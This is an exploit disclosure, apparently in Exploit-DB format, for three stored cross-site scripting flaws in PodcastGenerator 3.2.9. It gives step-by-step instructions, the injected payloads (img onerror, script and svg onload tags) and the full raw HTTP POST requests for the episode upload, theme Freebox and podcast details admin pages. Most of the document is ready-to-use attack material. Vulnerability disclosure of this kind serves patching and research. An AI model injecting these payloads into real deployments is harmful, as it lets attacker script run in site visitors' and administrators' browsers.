#Exploit Title: PodcastGenerator 3.2.9 - Multiple Stored Cross-Site Scripting (XSS)
#Application: PodcastGenerator
#Version: v3.2.9
#Bugs: Stored Xss
#Technology: PHP
#Vendor URL: https://podcastgenerator.net/
#Software Link: https://github.com/PodcastGenerator/PodcastGenerator
#Date of found: 14-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
2. Technical Details & POC
========================================
steps:
#########XSS -1##############
1.go to 'Episodes' then 'Upload New Episodes'(http://localhost/PodcastGenerator/admin/episodes_upload.php)
2.set title section as <img src=1 onerror=alert("XSS-1")>
3.And go to 'View All Episoded'(http://localhost/PodcastGenerator/admin/episodes_list.php)
payload: <img src=1 onerror=alert("XSS-1")>
poc- request:
POST /PodcastGenerator/admin/episodes_upload.php HTTP/1.1
Host: localhost
Content-Length: 8307
Cache-Control: max-age=0
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3NXAbhxohxCgUFNi
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/PodcastGenerator/admin/episodes_upload.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=b8oeamte4ebbhtu52dgnsrkljn
Connection: close
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="file"; filename="2023-05-13_2_images.jpeg"
Content-Type: image/jpeg
image content asdfasdfasdfasdfasdfasdfasdfa
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="title"
<img src=1 onerror=alert("XSS-1")>
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="shortdesc"
fffff
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="date"
2023-05-14
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="time"
11:05
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="episodecover"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="longdesc"
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="episodenum"
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="seasonnum"
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="itunesKeywords"
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="explicit"
yes
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="authorname"
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="authoremail"
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="customtags"
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="token"
6GnmEMNnhFfyNeTRciGsh8p4R4djazh8
------WebKitFormBoundary3NXAbhxohxCgUFNi--
#########XSS -2##############
1.go to "Themes and aspect" then "Customize your Freebox" (http://localhost/PodcastGenerator/admin/theme_freebox.php)
2. set Freebox content as <script>alert("XSS-2")</script>
3.go to home page (http://localhost/PodcastGenerator/)
payload: <script>alert("XSS-2")</script>
poc Request:
POST /PodcastGenerator/admin/theme_freebox.php?change=1 HTTP/1.1
Host: localhost
Content-Length: 96
Cache-Control: max-age=0
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/PodcastGenerator/admin/theme_freebox.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=b8oeamte4ebbhtu52dgnsrkljn
Connection: close
content=%3Cscript%3Ealert%28%22XSS-2%22%29%3C%2Fscript%3E&token=6GnmEMNnhFfyNeTRciGsh8p4R4djazh8
#########XSS -3##############
1. go to "Podcast Details" then "Change Podcast Details" (http://localhost/PodcastGenerator/admin/podcast_details.php)
2. set "Podcast tile " as <svg/onload=prompt("XSS-3")>
3.go to home page (http://localhost/PodcastGenerator/)
payload: <svg/onload=prompt("XSS-3")>
poc-request:
POST /PodcastGenerator/admin/podcast_details.php?edit=1 HTTP/1.1
Host: localhost
Content-Length: 300
Cache-Control: max-age=0
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/PodcastGenerator/admin/podcast_details.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=b8oeamte4ebbhtu52dgnsrkljn
Connection: close
podcast_title=%3Csvg%2Fonload%3Dprompt%28%22XSS-3%22%29%3E&podcast_subtitle=dd&podcast_description=dd©right=dd&author_name=Podcast+Generator+UserP&author_email=podcastgenerator%40example.com&podcast_guid=&feed_language=en&explicit_podcast=yes&feed_locked=no&token=xVrlAT6NG2ZrbGanycblGYoOOIitXXKC
